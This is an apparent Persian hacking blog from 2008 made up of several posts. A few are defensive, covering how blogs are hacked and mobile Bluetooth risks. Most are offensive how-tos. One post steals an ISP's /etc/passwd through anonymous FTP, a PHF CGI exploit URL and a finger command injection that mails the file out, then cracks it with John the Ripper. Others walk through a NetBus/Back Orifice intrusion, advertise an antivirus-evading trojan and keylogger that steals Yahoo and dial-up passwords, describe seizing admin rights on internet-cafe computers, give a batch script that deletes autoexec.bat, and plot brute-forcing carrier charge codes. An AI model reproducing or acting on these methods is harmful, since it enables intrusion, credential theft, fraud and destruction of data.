 |
 |
|
انگيزه هايي متعددي همچون کسب شهرت، قدرت نمايي، حذف مطالب مخالفان يا آزار باعث مي شود که افرادي همواره علاقه مند هک يا نابودي برخي وبلاگ ها باشند. در بين وبلاگ هاي فارسي نيز هر از گاهي شاهد هک و تغيير محتوا و صفحات برخي وبلاگ ها هستيم. بسياري اوقات تصور غلطي از اينگونه هکر ها وجود دارد گويي آنها از نبوغ يا تخصص فوق العاده يي بهره مي برند. اگرچه شايد چنين افرادي نيز وجود داشته باشند اما حقيقت آن است که شيوه هايي که معمولاً براي هک وبلاگ ها استفاده مي شود، بسيار ساده و رايج است و با کمي دقت مي توان از محتوا و مطالب وبلاگ در برابر افرادي که سوءنيت دارند، محافظت کرد. با توجه به ماهيت کارم همواره با مواردي از هک وبلاگ ها برخورد داشته ام و از همين رو در ادامه مطالب به برخي از مهم ترين و رايج ترين دلايل و شيوه هاي هک وبلاگ که در بين وبلاگ هاي فارسي نيز رايج است، اشاره يي خواهم داشت. فريب براي يک هکر يا فردي که داراي سوءنيت است، هيچ روشي ساده تر از فريب نويسنده وبلاگ و کسب اطلاعات از وي به جاي سر و کله زدن با شيوه هاي فني و تخصصي نيست. تقريباً اکثر سرويس هاي مطرح وبلاگ فارسي اخطارهايي به کاربران خود نسبت به دريافت اي ميل هاي جعلي داده اند و اين نشان از رايج بودن شيوه فوق براي فريب کاربراني که از سرويس هاي وبلاگ استفاده مي کنند، دارد. در اين شيوه هکرها تلاش مي کنند با ارسال اي ميل و پيام هايي چون افزايش امکانات يا حذف وبلاگ به دليل عدم فعاليت يا شناسايي وبلاگ هاي برتر و عناوين اينچنيني از طرف مديران سايت کاربران را فريب دهند تا نام کاربري و کلمه عبور وبلاگ خود را براي فرستنده اي ميل ارسال کنند. هکرها تمام تلاش خود را مي کنند که اي ميل ها هرچه بيشتر واقعي به نظر برسند. اما با کمي دقت مي توان دريافت که اي ميل ها جعلي هستند و البته بايد اين منطق را نيز در نظر داشت که عموماً مديران يک سرويس دهنده وبلاگ نيازي به دريافت کلمه عبور کاربران خود از اين طريق ندارند. صفحات جعلي صفحات جعلي يکي از شيوه هاي رايج سرقت اطلاعات کاربران وب سايت هاي مختلف در جهان است. در اين شيوه هکرها صفحاتي بسيار شبيه صفحه نخست يا صفحه ورود کاربران (Login) يک سايت را طراحي مي کنند و آن را در آدرسي که شبيه آدرس اصلي سايت باشد، قرار مي دهند. آنها اينگونه صفحات را به شيوه مختلف مانند ارسال اي ميل يا چت براي قرباني خود ارسال مي کنند و در اين ميان گاهي افراد بدون دقت در مورد آدرس اصلي صفحه فوق کلمه عبور خود را وارد اين صفحه مي کنند که در نهايت در اختيار هکر قرار خواهد گرفت. اين شيوه يکي از شيوه هاي رايج براي هک اي ميل هاي ياهو يا هات ميل يا حتي سرقت اطلاعات مالي افراد نيز هست و برخورد با اينگونه صفحات جعلي به عنوان هدفي در توسعه نسخه هاي جديد مرورگرهاي مطرح اينترنت مانند IE يا نرم افزار امنيتي مطرح است. چنين شيوه يي براي سرقت اطلاعات کاربري وبلاگ نويسان نيز مورد استفاده قرار مي گيرد و حتي در برخي وبلاگ ها يا سايت هاي هکرهاي ايراني صفحات جعلي آماده شبيه صفحات اصلي سايت هاي مطرح سرويس دهنده وبلاگ هاي فارسي براي سرقت اطلاعات ارائه مي شود. دقت در نوار آدرس مرورگر و بررسي صحت آدرس وب سايت در مواقعي که قرار است اطلاعات مهمي همچون کلمه عبور را در صفحه يي وارد کنيم، مي تواند بهترين شيوه براي حفاظت در برابر چنين تهديدي باشد. هک آي دي در چت سايت ها و وبلاگ هاي مرتبط با موضوع هک مملو از تروجان ها و نرم افزارهاي جاسوسي است که با هدف سرقت کلمه عبور اي ميل هاي ياهو يا ديگر سرويس هاي اي ميل مطرح و همچنين آي دي کاربران در چت است برنامه هاي کوچکي وجود دارند که به محض باز شدن در کامپيوتر قرباني کلمه عبور ياهو مسنجر وي را براي هکر ارسال مي کنند يا به صورت يک جاسوس در کامپيوتر مقيم شده و کلمه عبور وارد شده در صفحه ورود کاربر (Login) اي ميل ياهو را ثبت مي کنند. اين برنامه هاي کوچک با شيوه هاي مختلفي همچون اي ميل يا در چت يا با هدايت قرباني خود به صفحه اينترنتي خاصي و با عناوين فريب دهنده (مثل بازي جديد يا برنامه يي با امکانات جالب) به قرباني معرفي و در کامپيوتر وي نصب مي شوند. متاسفانه اين شيوه بسيار رايجي براي هک اي ميل و آي دي چت کاربران ايراني است و بسيار مورد استفاده ايراني هاي علاقه مند به هک است و به همين دليل تهديد بزرگي براي کاربران ايراني به شمار مي آيد. نفوذ به اي ميل افراد مي تواند گامي موثر براي سرقت اطلاعات وبلاگ باشد (معمولاً يا کلمه عبور وبلاگ در اي ميل فرد هست يا با استفاده امکان فراموشي کلمه عبور سايت سرويس دهنده وبلاگ اطلاعات ورود کاربر در اختيار هکر قرار مي گيرد). دقت در دريافت و به خصوص اجراي فايل ها و استفاده از نسخه هاي به روز شده آنتي ويروس ها و نرم افزارهاي فايروال مي تواند تا حدود زيادي خطرات چنين تهديدي را کاهش دهد. سرقت اطلاعات به خاطر داشته باشيد که کامپيوترهايي که مورد استفاده عموم هستند مانند کامپيوترهاي کافي نت ها يا دانشگاه ها بهترين گزينه براي نصب نرم افزارهاي جاسوسي و سرقت اطلاعات کاربران هستند و به صراحت مي توان گفت استفاده کنندگان از اين کامپيوترها بيشتر در معرض تهديد و سرقت اطلاعات مهم خود هستند. بنابراين تا آنجا که ممکن است اطلاعات مهم خود را در کافي نت ها يا در کامپيوترهاي دانشگاه وارد نکنيد يا حداقل اگر چنين مي کنيد در دوره هاي زماني کوتاه کلمه عبور خود را تغيير دهيد. کلمه عبور ساده خود را جاي يک هکر قرار دهيد. مطمئناً حدس و تست چند کلمه عبور يکي از شيوه هايي خواهد بود که در هک يک وبلاگ آن را تجربه مي کنيد. کساني که کلمات عبور ساده يي مانند نام کاربري يا نام واقعي خود يا اعداد ساده و قابل حدس انتخاب مي کنند، بيش از هر فرد ديگري نسبت به سرقت يا صدمه به اطلاعات وبلاگ خود مقصر هستند. البته شايد لازم نباشد کلمات عبور را آنقدر پيچيده انتخاب کنيد که حتي خودتان هم نتوانيد آن را به خاطر بسپاريد اما حداقل کلمه عبور وبلاگ خود را به شکلي انتخاب نکنيد که توسط ديگران قابل حدس باشد.برخي از کاربران نيز روي اعتماد کلمه عبور خود را در اختيار افراد ديگري (مثلاً براي ارسال مطالب، چک کردن نظرات يا تغيير در قالب و...) قرار مي دهند. شايد اين افراد واقعاً قصد صدمه به محتواي وبلاگ شما را نداشته باشند اما آيا شما مي توانيد مطمئن باشيد که مثلاً کامپيوتر آنها آلوده به تروجان يا نرم افزار جاسوسي نيست يا به نحوي اطلاعاتي که شما در اختيار آنها گذاشتيد به صورت ناخواسته توسط فرد ديگري رويت نمي شود؟ اگر در مواردي لازم شد کلمه عبور خود را به صورت مقطعي در اختيار فرد ديگري قرار دهيد مي توانيد بعد از اتمام کار کلمه عبور خود را تغيير دهيد. برخي ابزارها و سرويس هاي وبلاگ نيز به شما امکان تعريف نويسندگان يا کاربران ديگري را با امکانات محدودتر مي دهند که مي توانيد از اين امکانات استفاده کنيد. در ادامه دلايل هک وبلاگ ها مي توان به نواقص نرم افزاري در سايت هاي سرويس دهنده وبلاگ يا ابزارهاي مديريت وبلاگ اشاره کرد، البته اين اشکالات عموماً زود کشف و رفع مي شوند. همچنين مانيتورينگ ترافيک شبکه و مشاهده کلمه هاي عبور وارد شده توسط کارمندان يک شرکت يا سازمان توسط مسوولان فني شبکه يا فريب مسوولان پشتيباني سايت يا شرکت ميزبان وبلاگ و همچنين فريب کاربران طمعکار با عنوان هک وبلاگ ديگران با ورود کلمه عبور شخصي خودشان نيز از شيوه هايي هستند که در مواردي باعث صدمه به محتواي يک وبلاگ شده اند. |
|
+ نوشته شده در
جمعه بیست و ششم مهر 1387ساعت 7:48 بعد از ظهر توسط mahyar |
|
|
اخیرا برنامه تو نت پر شده بنام تولید کننده کد های کارت شارژ که فکر کنم اصلا ربط منطقی به هم نداشته باشند چون با انتخاب تعداد رقم یه سری کد تولید میکند که اگه بخواهیم از نظر ریاضیات گسسته و احتمال تعداد حالات کد رو حساب کنیم باید:10*10*10*10*10*10*10*10*10*10*10*9 (*علامت ضرب
 و 9 بخاطر اینکه عدد اول 0 نمیتونه باشه با یه ضرب ساده میفهمیم که چه عدد گردن کلفیه :حالا من این برنامه رو میزارم شاید بخواین بیشتر باهاش اشنا بشین.ولی حالا من چند راهکار دارم اگه کسی نظری داشت پیشنهاد بده1)برنامه برای پیدا کردن الگوریتم این کد ها پیدا کنیم البته من یه برنامه جاوا دارم ک رو گوشی خودم جواب نداد و هنوز تست نکردم که اونم میزارم 2)طراحی یه مبدل که بشه با وصل به کامپیوتر و برنامه با شیوهbrute forceبه ایرانسل کد بفرستد که اینم 3سوته سیمکارت لو میر پدرمونو در میارن. 3)هک مستقیم خود سایت :که تا اونجایی که من شنیدم کاربرای ایرانسل هندی و پاکستانی اند و میدونین که هندیا خوره برنامه نویسی اند . حالا از دوستان اگه کسی نظری داشت بگه ممنون میشم چون هر چی از این شرکتای مفت خور بزنی هنر کردی نوش جونت 
|
|
+ نوشته شده در
پنجشنبه بیستم تیر 1387ساعت 6:22 قبل از ظهر توسط mahyar |
|
از ویکیپدیا، دانشنامهٔ آزاد.هک به معنی به اوج کمال و تکامل رسیدن در یک رشته می باشد ، هکر در موسیقی کسی است که به درجه ای از توانایی در موسیقی رسیده است که می تواند در آن دخل و تصرف کند این فرد دیگر نیازی به خواندن نت ندارد او از این مراحل گذشته است به معنی خاص (که امروزه رایج تر است) هک و هکر در زمینه ی رایانه بکار می رود. البته این تعریف در زمینه رایانه هیچ تفاوتی نمی کند هکر در علم رایانه کسی است که به درجه ای از توانایی رسیده باشد که تواند تمام قید و بند های دنیای رایانه را تجزیه و تحلیل کند و بهبود بخشد و نقاط ضعف آنرا بیابد (و البته برای اثبات ضعف به آن نفوذ کند ولی خرابکاری نکند) ... مانند هکر در تمامی رشته ها. یک هکر در رشته ی موسیقی امکان دارد روزی سازی را منسوخ شده اعلام کند و حتما برای این کار خود دلیل دارد و دلیل خود را اثبات می کند (احتمالا با نشان دادن ضعف در آن آلت موسیقی یا ...) هکر در زمینه ی رایانه هم به همین معناست . این واژه (هکر) با واژه ی کرکر که خود هکر ها از آنها تنفر دارند اشتباه گرفته می شود و هکر ها را تا سرحد مرگ عصبانی می کند ! هکر خرابکار نیست بلکه یک استاد است . کرکر خرابکار است و بزهکار اجتماعی است و باید با اون برخورد شود هك در اينترنت يعني نفوذ كردن |
|
+ نوشته شده در
دوشنبه دهم تیر 1387ساعت 6:51 قبل از ظهر توسط mahyar |
|
|
موبایل شما هم هک شده؟ پشت فرمان نشستید، گرمای بیش از حد هوا و یک ترافیک سنگین حسابی حال شما را جا آورده. تو این گیر و دار صدای دریافت یک فایل توسط بلوتوث تلفن همراهتان توجه شما را به خود جلب میکند. زیر چشمی دور و بر خود را برانداز میکنید تا شاید فرستنده را بیابید اما خبری نیست. با این حال باز موافقت میکنید. یک فایل خیلی ساده برای شما ارسال میشود شاید عکس یک منظره. بی تفاوت از کنار این مساله میگذرید غافل از آنکه شما هک شدهاید. بله درست فهمیدید. تلفن همراه شما هک شده است. البته این هک به این معنا نیست که دیگر اختیاری در کنترل تلفن همراهتان نداشته باشید بلکه بسته به نوع حملهای که صورت گرفته ممکن است دفترچه تلفن و یا تمامی پیامهای کوتاهی که در باکس شما وجود دارد برای هکر ارسال شده باشد. البته در بعضی از مواقع، دزدیده شدن اطلاعات شخصی شما به رحم و انصاف هکر مورد نظر نیز بستگی دارد. در برخی از مواقع هکرهای تلفن همراه بیشتر به دنبال عکسها و حتی فیلمهای شخصی شما هستند تا دفتر تلفن. هک به معنای دسترسی، ایجاد تغییر و یا سوءاستفاده از اطلاعات شخصی دیگران، امروزه به عنوان یکی از بزرگترین مشکلات دنیای دیجیتال محسوب میشود. معضلی که نهادها و افراد بسیاری را برای مقابله با خطرات و ضررهای احتمالی به خود مشغول کرده است.  فراگیر شدن اینترنت و استفاده از کامپیوترهای شخصی از یک سو و ارائه سرویسهای متنوع در بستر شبکههای محلی و جهانی از سوی دیگر باعث شده که این روزها هکرها و یا همان دزدان دیجیتالی روزهای خوشتری نسبت به دزدان دریایی سابق پیش روی خود داشته باشند. نفوذ به دنیای مجازی کاربران و استفاده از اطلاعات شخصی آنها در اینترنت امروزه به امری فراگیر تبدیل شده است. البته استفاده از نامهای دخترانه برای ارسال پیام نیز شیوهای است مرسوم که به دفعات در حملات اینترنتی مشاهده میشود و در این بین رعایت نکات ایمنی و استفاده از نرمافزارهای آنتی هک تا حدی جلوی تخریب اطلاعات کاربران مجازی را گرفته است. شاید همین امر باعث شده باشد که هکرهای حرفهای گستره فعالیتهای خود را افزایش داده و به سراغ کاربران تلفن همراه آمده باشند. البته نقش استفاده از تکنولوژیهای جدید و استفاده از اینترنت در بستر تلفن همراه را نباید دراین بین فراموش کرد.
ارتباطات بی سیم هدف اصلیبه اعتقاد بسیاری از کارشناسان، بیشتر حملات مخرب در بخش تلفن همراه مربوط به افرادی است که تمایل زیادی به استفاده از خدمات مبتنی بر GPRS دارند. ارتباطات مخابراتی و بیسیمی، یکی از اصلیترین اهدافی است که مورد توجه هکرها قرار میگیرد. آنها مکالمات هرکسی را که بخواهند تحت کنترل خود میگیرند و به این ترتیب میتوانند به فایلهای متنی، اطلاعات شخصی و حتی عکسهای گرفته شده توسط تلفن همراه قربانی دست یابند. در حالی که امروزه کارشناسان امنیتی بر بکارگیری راههای گوناگون برای مقابله با این اقدامات هشدار میدهند اما تا همین یک سال پیش معتقد بودند که هک در شبکه مخابراتی معنایی ندارد.
نرمافزارهای فضولاما در عین حال امروز شاهد گسترش نرمافزارهای هک توسط برخی از ارائه دهندگان خدمات تلفن همراه هستیم. البته ناگفته نماند که فعالیت صورت گرفته در این زمینه بیشتر در شبکه اینترنت صورت میگیرد. برای روشن شدن این موضوع کافی است جمله هک در تلفن همراه را در گوگل جستوجو کنید. آن زمان است که با حجم عظیمیاز وبلاگها و سایتهایی مواجه میشوید که به صورت رایگان نرمافزارهای مورد نیاز را به همراه آموزش گام به گام در اختیار ناقضان حریم خصوصی میگذارند. چندی پیش نیز در حاشیه برگزاری نمایشگاه رسانههای دیجیتالی در بخش تلفن همراه شاهد غرفهای بودیم که به راحتی نرمافزار هک تلفن همراه با قیمت ناچیز 3 هزار و پانصد تومان را عرضه کرده بود. امکانات بیشمار این نرمافزار که در بروشورهای تبلیغاتی آن عرضه شده بود باعث میشد که ناخودآگاه از خاموش بودن بلوتوث تلفن همراه خود مطمئن باشید.  البته نفوذ به تلفن همراه همیشه از راه نصب و به کارگیری نرمافزار و استفاده از تکنولوژی بلوتوث خلاصه نمیشود. وارد کردن کدهای مخصوصی در گوشی فرد قربانی که با استفاده از آنها پرداخت وجه مکالمات شما به حساب فرد قربانی گذاشته میشود. حتی در برخی از مواقع نیز مشاهده شده که به وسیله ارسال پیام کوتاه و یا وارد کردن یک کد مخصوص میتوان گوشی و سیمکارت فرد مقابل را به راحتی سوزاند! البته شاید با خواندن این گزارش اعتماد شما نسبت به استفاده از گوشیهای نسل جدید سلب شده باشد اما زیاد نگران نباشید چرا که اگر در زمینه استفاده از فناوری بلوتوث و GPRS از یک سو و نیز در اختیار نگذاشتن گوشی تلفن همراتان در دسترس افراد سود جو نکات ایمنی را رعایت کنید، خطری متوجه شما نخواهد بود.
حفاظت در مقابل تهدیدات به منظور حفاظت در مقابل تهدیدات موجود رعایت موارد زیر توصیه میشود: 1 - مطمئن شوید بلوتوث تلفن همراهتان همیشه خاموش باشد مگر در مواردی که خود به آن نیاز دارید. 2 - حتی المقدور از هندزفریهای مجهز به تکنولوژی بلوتوث استفاده نکنید. 3 - گزینههای موجود در قسمت بلوتوث گوشی خود را به نحوی تنظیم کنید که برای دریافت فایلهای ارسالی حداقل دو بار از شما موافقت بخواهد. 4 - در هنگام اتصال به اینترنت از طریق تلفن همراه بر روی لینکها و پیامهای نامطمئن کلیک نکنید. 5 - امروزه وب سایتهای متعددی را میتوان یافت که بازی و یا نرمافزارهای رایگان را به منظور نصب بر روی تلفن همراه دراختیار کاربران قرار میدهند. این نوع نرمافزارها ممکن است حاوی کدهای مخربی باشند. توصیه میشود که هرگز از سایتهایی که هویت آنها به اثبات نرسیده و نسبت به صحت و صداقت عملکرد آنها اطمینانی حاصل نشده است، نرمافزاری دریافت نگردد. درصورت دریافت یک فایل از یک وب سایت معتبر نیز باید در ابتدا با استفاده از نرمافزارهای آنتی ویروس آن را بررسی کرد.
منبع: دنیای اقتصاد |
|
+ نوشته شده در
پنجشنبه بیست و سوم خرداد 1387ساعت 7:22 بعد از ظهر توسط mahyar |
|
|
+ نوشته شده در
چهارشنبه یازدهم اردیبهشت 1387ساعت 8:12 قبل از ظهر توسط mahyar |
|
|
کارت اینترنت مجانی
چند روزي بود فكر استفاده از يك كارت اينترنت مجاني داشت ديوونم ميكرد... البته بگم ها ما حروم خور هم نيستيم ... آخه بابا به پير به پيغمبر نامرديه كه ما اين همه پول كارت هاي آبكي اينترنت رو ميديم ... يكمي هم كيف دنيا رو كنيم.البته من راهی پیدا کردم که بشه یک کارت اینترنت مجانی به دست آورد.این راه را در ادامه مطلب نوشتم.(لطفا مطالب را با دقت بخوانید) Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و دربيشتر شهر هاي بزرگ هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي نفوذ گر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شما يك فايل Passwdرا باز كنيد چنين نوشته هايي را مي بينيد .كه بايد آن را از حالت رمز در آورد . root:2fkbNba29uWys:0:1:Operator:/:/bin/csh admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh Taha:3A62i9qr:1012:10:Mashhad در اينجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده مي باشد . شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكن مي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود . root:*:0:1:Operator:/:/bin/csh admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در حوصله اين مقاله نمي گنجد .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد FTP http://www.domain.com/ كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد FTP ftp.domain.com اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد . http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد . www.domain.com/cgi-bin/finger اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد . ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است . bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd با وارد كردن اين دستور فايل Passwdبراي من به آدرس 3dhack@yahoo.com پست مي شود ! خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد . حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونه اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني www.hackersclub.com/km/frontpageبه دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد . به همين راحتي. |
|
+ نوشته شده در
چهارشنبه چهارم اردیبهشت 1387ساعت 8:12 قبل از ظهر توسط mahyar |
|
|
سلام امروز ميخوام يك نرم افزار توپ توپ توپ توپ ......... براتون براي دانلود بذارم. ******اگه ميخواي 24 ساعت تو اينترنت ايرانسل تو مبايلت مجاني بگردي ******اگه ميخواي SMSيا مكالمهي رايگان داشته باشي بدون كم شدن حساب حتما نظر بده اين نرم افزار رو دانلود كن!!!!!!!!!!!!!!!!!!!!!!! نكته:اين نرم افزار به صورت sis دانلود ميشود و بايد بر روي مبايل اجرا شود. دانلود |
|
+ نوشته شده در
چهارشنبه چهارم اردیبهشت 1387ساعت 7:56 قبل از ظهر توسط mahyar |
|
|
ما به این برنامه ها احتیاج داریم که همش تو خود ویندوز هست: BACK ORFICE. Wingate.Netbus.Telnet
اول وارد Wingate شده و در جایی که نوشته شده HOST NAME آی پی قربانی رو قرار می دیم و در قسمت بعدی به Scan port رفته و Defualt برنامه که Port 23 هست رو به 12345 تغییر میدهیم و گزینه سوم که try to open port only هست را انتخاب و اسکن رو بزنید. البته در اينجا ميتونيد از يه RANGE IP هم استفاده كنيد وهم مي تونيد اي پي قرباني رو بدهيد و در صورت باز بودن پورت ميتونيد مراحل بعدي رو اجرا كنيد. حالا ما فرض رو بر اين ميذاريم كه يه Range Ip دادیم. بعد از اسکن شما با قسمتی به نام Server Found مواجه می شوید که یکسری آی پی را با پورتهای باز مورد نظر شما پیدا کرده که در ادامه باید یکی از آی پی هارو به دلخواه انتخاب کنید. در قسمت بعدي NETBUS را باز كرده و در جاي Hostname/IP اي پي مورد نظر را وارد كنيد و در ادامه ي كار اگر از شما پسسورد بخواهد بايد از Telnet استفاده كنيد و اگر نخواهد كه كار تقريبا تمومه . حالا فرض ميكنيم كه پسسورد خواست بايد مراحل زير را طي كنيد: به قسمت RUN رفته و CMD را اجرا كرده و بعد Telnet را اجرا كنيد و اي پي را نوشته و بعد از پرت 12345 استفاده كنيد در پنجره Netbus براي كرك پسوورد اين نوشته را وارد كنيد: Password;1;123serverPWD;Y4hoo شما ميتونيد پسورد ديگه اي هم بذاريد حالا با Netbus دوباره وصل شده و پسورد را Y4hoo ميزنيد همه چيز در دست شماست حالا به قسمت File Manager رفته و سرور را به سيستم طرف ارسال كنيد و در قسمتي كه از شما پرسيد سرور را به كجا بفرستم شما ادرس C:Windows را ميدهيد .و قسمت دانلود را ميبنديم . حالا كارمون با Netbus تموم شد . حالا به BACK ORFICE ميريم و در قسمت Target Host اي پي طرفو ميزنيم و پرت 12345 و باز در قسمت بعدي پسورد را زده و SEND را ميزنيم با اين روش كارهاي زيادي ميشه انجام داد |
|
+ نوشته شده در
یکشنبه بیست و پنجم فروردین 1387ساعت 2:23 بعد از ظهر توسط mahyar |
|
|
این نسخه که روی یاهو ۸ هم جواب می ده هم کی لاگر هم یاهو پسورد سندر هم دیال آپ پسورد سندر اه توسط هیچ آنتی ویروسی حتی NOD32 شناسایی نمی شه و سر آنتی ها رو حتی قبل از اجرا شدن زیر آب می کنه
این واقعا یه تروجان 4 کارست!!!»»Yahoo PS++»KeyLogger+»DialUp PS+»R3S )Remote Shell Service by Server) برای اولین بار در جهان!
حالا میخوام ببینم با نظرات چه میکنید!! |
|
+ نوشته شده در
شنبه بیست و چهارم فروردین 1387ساعت 7:45 بعد از ظهر توسط mahyar |
|
|
امروز میخوام شما را با یکی از مفیدترین قسمت های ویندوز اشنا کنم که کابردی بسیار خوبی در هک کردن کافی نت هایی که تمام قسمتهای سیستم ها را بسته اند حتی دانلود کردن را. شما با این اموزش خیلی راحت در عرض چند ثانیه برای خود یک یوزر administrator ایجاد کرده و تمام محدودیتهایی که برای شما بوده بر داشته میشود
در خوب دوستان فکر کنید شما رفتید به یک کافی نت ولی مدیر کافی نت ار بس خسیسه که تمام قسمتها سیستم را قفل کرده از دانلود برنامه گرفته تا کلیک راست در دسکتاب..چاره چیست
این برنامه دارای امکانات فراوانی هست که به چند نمونه آن می پردازم : الف - ارسال هر چی که قربانی با صفحه کلید تایپ میکنه و یا با موس کلیک میکنه ب - ارسال User , Password , Phone قسمت Connection سیستم قربانی پ - شناسایی سایت Yahoo , Gmail برای فهمیدن Email , Password قربانی ت - شناسایی Yahoo Messenger برای فهمیدن ID , Password قربانی ث - قابلیت آپدیت ( به روز شدن ) از اینترنت ج - قابلیت ارسال آدرس وبلاگها و وب سایتهای رجوع شده در سیستم قربانی چ - قابلیت دانلود هر چیز از اینترنت و اجرا در سیستم قربانی ح - تعیین آیکون ها 100% اصل و طبیعی خ - عبور از آنتی ویروس ها و عدم شناسایی آن د - قابلیت ترکیب با فایلهای دیگر از جمله عکس و برنامه و متن و ... ذ - قابلیت ساخت پیغام های خطای سیستمی ر - ارسال ایمیل از هر ایمیل و پشتیبانی توسط سایت یاهو (Yahoo) ز - ارسال مشخصات سیستم قربانی م- پشتیبانی از سیستم مادر ن - مسدود کردن راههای نابودی به صورت کاملا مخفی ی- و .......
۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ویژه گیهای این برنامه از دید من(کارایی اصلی این برنامه)
۱-ارسال User , Password , Phone قسمت Connection سیستم قربانی ۲-ارسال لیست سایتهای بازدید شده توسط قربانی(Favorites) ۳-ارسال پسورد یاهو مسنجر در صورت ذخیره شدن ۴-ارسال نام سیستم و دارای باندر و ایجاد پیغام خطالی جعلی ۵-عبور از آنتی ویروس ها و عدم شناسایی آن در زیر دو تا لینک برای دانلود کذاشته شده است که شما به دلخواه یکی از انها را انتخاب کنید
|
|
+ نوشته شده در
شنبه بیست و چهارم فروردین 1387ساعت 7:40 بعد از ظهر توسط mahyar |
|
|
این ویروس پس از اجرا باعث میشه کامپیوتر در صورت reset شدن دیگه بالا نیاد ؟
del autoexec.bat اگر ویندوز xp باشه به جای cd winnt بنویسید cd windows این ویروس را هم در notepad با پسوند bat سیو کند؟ ************************************************** برنامه ای برای هک ایدی بدون فرستادن فایل
دوستان عزیز شما باید طبق عکس و شماره به شماره این کار را انجام بدین ؟
